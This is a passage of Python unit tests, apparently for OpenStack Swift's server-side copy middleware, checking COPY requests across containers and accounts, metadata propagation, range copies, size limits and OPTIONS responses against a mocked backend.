def test_copy_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'Content-Length': '0',
'X-Copy-From': '/c/o'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_basic_COPY(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'etag': 'is sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o-copy', self.authorized[1].path)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o-copy')])
self.assertIn('etag', self.app.headers[1])
self.assertEqual(self.app.headers[1]['etag'], 'is sent')
# For basic test cases, assert orig_req_method behavior
self.assertEqual(req.environ['swift.orig_req_method'], 'COPY')
def test_basic_DLO(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'x-object-manifest': 'some/path',
'etag': 'is not sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(self.app.calls, [
('GET', '/v1/a/c/o'),
('PUT', '/v1/a/c/o-copy')])
self.assertNotIn('x-object-manifest', self.app.headers[1])
self.assertNotIn('etag', self.app.headers[1])
def test_basic_DLO_manifest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {
'x-object-manifest': 'some/path',
'etag': 'is sent'}, 'passed')
self.app.register('PUT', '/v1/a/c/o-copy', swob.HTTPCreated, {})
req = Request.blank(
'/v1/a/c/o?multipart-manifest=get', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(2, len(self.app.calls))
self.assertEqual('GET', self.app.calls[0][0])
get_path, qs = self.app.calls[0][1].split('?')
params = urllib.parse.parse_qs(qs)
self.assertDictEqual(
{'format': ['raw'], 'multipart-manifest': ['get']}, params)
self.assertEqual(get_path, '/v1/a/c/o')
self.assertEqual(self.app.calls[1], ('PUT', '/v1/a/c/o-copy'))
self.assertIn('x-object-manifest', self.app.headers[1])
self.assertEqual(self.app.headers[1]['x-object-manifest'], 'some/path')
self.assertIn('etag', self.app.headers[1])
self.assertEqual(self.app.headers[1]['etag'], 'is sent')
def test_COPY_source_metadata(self):
source_headers = {
'x-object-sysmeta-test1': 'copy me',
'x-object-meta-test2': 'copy me too',
'x-object-transient-sysmeta-test3': 'ditto',
'x-object-sysmeta-container-update-override-etag': 'etag val',
'x-object-sysmeta-container-update-override-size': 'size val',
'x-object-sysmeta-container-update-override-foo': 'bar',
'x-delete-at': 'delete-at-time'}
get_resp_headers = source_headers.copy()
get_resp_headers['etag'] = 'source etag'
self.app.register(
'GET', '/v1/a/c/o', swob.HTTPOk,
headers=get_resp_headers, body='passed')
def verify_headers(expected_headers, unexpected_headers,
actual_headers):
for k, v in actual_headers:
if k.lower() in expected_headers:
expected_val = expected_headers.pop(k.lower())
self.assertEqual(expected_val, v)
self.assertNotIn(k.lower(), unexpected_headers)
self.assertFalse(expected_headers)
# use a COPY request
self.app.register('PUT', '/v1/a/c/o-copy0', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy0'})
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('201 Created', status)
verify_headers(source_headers.copy(), [], resp_headers)
method, path, put_headers = self.app.calls_with_headers[-1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o-copy0', path)
verify_headers(source_headers.copy(), [], put_headers.items())
self.assertIn('etag', put_headers)
self.assertEqual(put_headers['etag'], 'source etag')
req = Request.blank('/v1/a/c/o-copy0', method='GET')
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('200 OK', status)
verify_headers(source_headers.copy(), [], resp_headers)
# use a COPY request with a Range header
self.app.register('PUT', '/v1/a/c/o-copy1', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', method='COPY',
headers={'Content-Length': 0,
'Destination': 'c/o-copy1',
'Range': 'bytes=1-2'})
status, resp_headers, body = self.call_ssc(req)
expected_headers = source_headers.copy()
unexpected_headers = (
'x-object-sysmeta-container-update-override-etag',
'x-object-sysmeta-container-update-override-size',
'x-object-sysmeta-container-update-override-foo')
for h in unexpected_headers:
expected_headers.pop(h)
self.assertEqual('201 Created', status)
verify_headers(expected_headers, unexpected_headers, resp_headers)
method, path, put_headers = self.app.calls_with_headers[-1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o-copy1', path)
verify_headers(
expected_headers, unexpected_headers, put_headers.items())
# etag should not be copied with a Range request
self.assertNotIn('etag', put_headers)
req = Request.blank('/v1/a/c/o-copy1', method='GET')
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('200 OK', status)
verify_headers(expected_headers, unexpected_headers, resp_headers)
# use a PUT with x-copy-from
self.app.register('PUT', '/v1/a/c/o-copy2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o-copy2', method='PUT',
headers={'Content-Length': 0,
'X-Copy-From': 'c/o'})
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('201 Created', status)
verify_headers(source_headers.copy(), [], resp_headers)
method, path, put_headers = self.app.calls_with_headers[-1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o-copy2', path)
verify_headers(source_headers.copy(), [], put_headers.items())
self.assertIn('etag', put_headers)
self.assertEqual(put_headers['etag'], 'source etag')
req = Request.blank('/v1/a/c/o-copy2', method='GET')
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('200 OK', status)
verify_headers(source_headers.copy(), [], resp_headers)
# copy to same path as source
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', method='PUT',
headers={'Content-Length': 0,
'X-Copy-From': 'c/o'})
status, resp_headers, body = self.call_ssc(req)
self.assertEqual('201 Created', status)
verify_headers(source_headers.copy(), [], resp_headers)
method, path, put_headers = self.app.calls_with_headers[-1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
verify_headers(source_headers.copy(), [], put_headers.items())
self.assertIn('etag', put_headers)
self.assertEqual(put_headers['etag'], 'source etag')
def test_COPY_no_destination_header(self):
req = Request.blank(
'/v1/a/c/o', method='COPY', headers={'Content-Length': 0})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
self.assertEqual(len(self.authorized), 0)
def test_basic_COPY_account(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o2', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c1/o2',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('GET', method)
self.assertEqual('/v1/a/c/o', path)
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o2', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o2', self.authorized[1].path)
def test_COPY_across_containers(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c2/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c2/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c2/o', self.authorized[1].path)
def test_COPY_source_with_slashes_in_name(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_source_with_slashes_in_name(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_source_with_slashes_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_source_with_slashes_destination_leading_slash(self):
self.app.register('GET', '/v1/a/c/o/o2', swob.HTTPOk, {}, 'passed')
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o/o2',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertTrue(('X-Copied-From', 'c/o/o2') in headers)
self.assertTrue(('X-Copied-From-Account', 'a') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o/o2', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_no_object_in_destination(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c_o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_account_no_object_in_destination(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': 'c_o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_account_bad_destination_account(self):
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'Destination-Account': '/i/am/bad'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '412 Precondition Failed')
def test_COPY_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_server_error_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPServiceUnavailable, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '503 Service Unavailable')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_not_found_reading_source(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPNotFound, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '404 Not Found')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_with_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed")
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'X-Object-Meta-Ours': 'okay'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_with_metadata(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "passed")
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'X-Object-Meta-Ours': 'okay',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a1/c1/o', path)
self.assertEqual(req_headers['X-Object-Meta-Ours'], 'okay')
self.assertTrue(('X-Object-Meta-Ours', 'okay') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_source_zero_content_length(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None)
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_source_zero_content_length(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, None)
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_account_source_larger_than_max_file_size(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk, {}, "largebody")
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
with mock.patch('swift.common.middleware.copy.'
'MAX_FILE_SIZE', 1):
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '413 Request Entity Too Large')
self.assertEqual(len(self.authorized), 1)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def test_COPY_newest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'Last-Modified': '123'}, "passed")
self.app.register('PUT', '/v1/a/c/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c/o'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a/c/o', self.authorized[1].path)
def test_COPY_account_newest(self):
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'Last-Modified': '123'}, "passed")
self.app.register('PUT', '/v1/a1/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'COPY'},
headers={'Destination': '/c1/o',
'Destination-Account': 'a1'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
self.assertTrue(('X-Copied-From-Last-Modified', '123') in headers)
self.assertEqual(len(self.authorized), 2)
self.assertEqual('GET', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
self.assertEqual('PUT', self.authorized[1].method)
self.assertEqual('/v1/a1/c1/o', self.authorized[1].path)
def test_COPY_in_OPTIONS_response(self):
self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk,
{'Allow': 'GET, PUT'})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'OPTIONS'}, headers={})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('OPTIONS', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('Allow', 'GET, PUT, COPY') in headers)
self.assertEqual(len(self.authorized), 1)
self.assertEqual('OPTIONS', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
# For basic test cases, assert orig_req_method behavior
self.assertNotIn('swift.orig_req_method', req.environ)
def test_COPY_in_OPTIONS_response_CORS(self):
self.app.register('OPTIONS', '/v1/a/c/o', swob.HTTPOk,
{'Allow': 'GET, PUT',
'Access-Control-Allow-Methods': 'GET, PUT'})
req = Request.blank('/v1/a/c/o',
environ={'REQUEST_METHOD': 'OPTIONS'}, headers={})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '200 OK')
calls = self.app.calls_with_headers
method, path, req_headers = calls[0]
self.assertEqual('OPTIONS', method)
self.assertEqual('/v1/a/c/o', path)
self.assertTrue(('Allow', 'GET, PUT, COPY') in headers)
self.assertTrue(('Access-Control-Allow-Methods',
'GET, PUT, COPY') in headers)
self.assertEqual(len(self.authorized), 1)
self.assertEqual('OPTIONS', self.authorized[0].method)
self.assertEqual('/v1/a/c/o', self.authorized[0].path)
def _test_COPY_source_headers(self, extra_put_headers):
# helper method to perform a COPY with some metadata headers that
# should always be sent to the destination
put_headers = {'Destination': '/c1/o',
'X-Object-Meta-Test2': 'added',
'X-Object-Sysmeta-Test2': 'added',
'X-Object-Transient-Sysmeta-Test2': 'added'}
put_headers.update(extra_put_headers)
get_resp_headers = {
'X-Timestamp': '1234567890.12345',
'X-Backend-Timestamp': '1234567890.12345',
'Content-Type': 'text/original',
'Content-Encoding': 'gzip',
'Content-Disposition': 'attachment; filename=myfile',
'X-Object-Meta-Test': 'original',
'X-Object-Sysmeta-Test': 'original',
'X-Object-Transient-Sysmeta-Test': 'original',
'X-Foo': 'Bar'}
self.app.register(
'GET', '/v1/a/c/o', swob.HTTPOk, headers=get_resp_headers)
self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {})
req = Request.blank('/v1/a/c/o', method='COPY', headers=put_headers)
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
self.assertEqual(2, len(calls))
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
# these headers should always be applied to the destination
self.assertEqual('added', req_headers.get('X-Object-Meta-Test2'))
self.assertEqual('added', req_headers.get('X-Object-Sysmeta-Test2'))
self.assertEqual('added',
req_headers.get('X-Object-Transient-Sysmeta-Test2'))
return req_headers
def test_COPY_source_headers_no_updates(self):
# copy should preserve existing metadata if not updated
req_headers = self._test_COPY_source_headers({})
self.assertEqual('text/original', req_headers.get('Content-Type'))
self.assertEqual('gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=myfile',
req_headers.get('Content-Disposition'))
self.assertEqual('original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('original', req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Bar', req_headers.get('X-Foo'))
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
def test_COPY_source_headers_with_updates(self):
# copy should apply any updated values to existing metadata
put_headers = {
'Content-Type': 'text/not_original',
'Content-Encoding': 'not_gzip',
'Content-Disposition': 'attachment; filename=notmyfile',
'X-Object-Meta-Test': 'not_original',
'X-Object-Sysmeta-Test': 'not_original',
'X-Object-Transient-Sysmeta-Test': 'not_original',
'X-Foo': 'Not Bar'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('text/not_original', req_headers.get('Content-Type'))
self.assertEqual('not_gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=notmyfile',
req_headers.get('Content-Disposition'))
self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Not Bar', req_headers.get('X-Foo'))
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
def test_COPY_x_fresh_metadata_no_updates(self):
# existing user metadata should not be copied, sysmeta is copied
put_headers = {
'X-Fresh-Metadata': 'true',
'X-Extra': 'Fresh'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('text/original', req_headers.get('Content-Type'))
self.assertEqual('Fresh', req_headers.get('X-Extra'))
self.assertEqual('original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertIn('X-Fresh-Metadata', req_headers)
self.assertNotIn('X-Object-Meta-Test', req_headers)
self.assertNotIn('X-Object-Transient-Sysmeta-Test', req_headers)
self.assertNotIn('X-Timestamp', req_headers)
self.assertNotIn('X-Backend-Timestamp', req_headers)
self.assertNotIn('Content-Encoding', req_headers)
self.assertNotIn('Content-Disposition', req_headers)
self.assertNotIn('X-Foo', req_headers)
def test_COPY_x_fresh_metadata_with_updates(self):
# existing user metadata should not be copied, new metadata replaces it
put_headers = {
'X-Fresh-Metadata': 'true',
'Content-Type': 'text/not_original',
'Content-Encoding': 'not_gzip',
'Content-Disposition': 'attachment; filename=notmyfile',
'X-Object-Meta-Test': 'not_original',
'X-Object-Sysmeta-Test': 'not_original',
'X-Object-Transient-Sysmeta-Test': 'not_original',
'X-Foo': 'Not Bar',
'X-Extra': 'Fresh'}
req_headers = self._test_COPY_source_headers(put_headers)
self.assertEqual('Fresh', req_headers.get('X-Extra'))
self.assertEqual('text/not_original', req_headers.get('Content-Type'))
self.assertEqual('not_gzip', req_headers.get('Content-Encoding'))
self.assertEqual('attachment; filename=notmyfile',
req_headers.get('Content-Disposition'))
self.assertEqual('not_original', req_headers.get('X-Object-Meta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Sysmeta-Test'))
self.assertEqual('not_original',
req_headers.get('X-Object-Transient-Sysmeta-Test'))
self.assertEqual('Not Bar', req_headers.get('X-Foo'))
def test_COPY_with_single_range(self):
# verify that source etag is not copied when copying a range
self.app.register('GET', '/v1/a/c/o', swob.HTTPOk,
{'etag': 'bogus etag'}, "abcdefghijklmnop")
self.app.register('PUT', '/v1/a/c1/o', swob.HTTPCreated, {})
req = swob.Request.blank(
'/v1/a/c/o', method='COPY',
headers={'Destination': 'c1/o',
'Range': 'bytes=5-10'})
status, headers, body = self.call_ssc(req)
self.assertEqual(status, '201 Created')
calls = self.app.calls_with_headers
self.assertEqual(2, len(calls))
method, path, req_headers = calls[1]
self.assertEqual('PUT', method)
self.assertEqual('/v1/a/c1/o', path)
self.assertNotIn('etag', (h.lower() for h in req_headers))
self.assertEqual('6', req_headers['content-length'])
req = swob.Request.blank('/v1/a/c1/o', method='GET')
status, headers, body = self.call_ssc(req)
self.assertEqual('fghijk', body)
@patch_policies(with_ec_default=True)
class TestServerSideCopyMiddlewareWithEC(unittest.TestCase):
container_info = {
'status': 200,
'write_acl': None,
'read_acl': None,
'storage_policy': None,
'sync_key': None,
'versions': None,
}
def setUp(self):
self.logger = debug_logger('proxy-server')
self.logger.thread_locals = ('txn1', '127.0.0.2')
self.app = PatchedObjControllerApp(
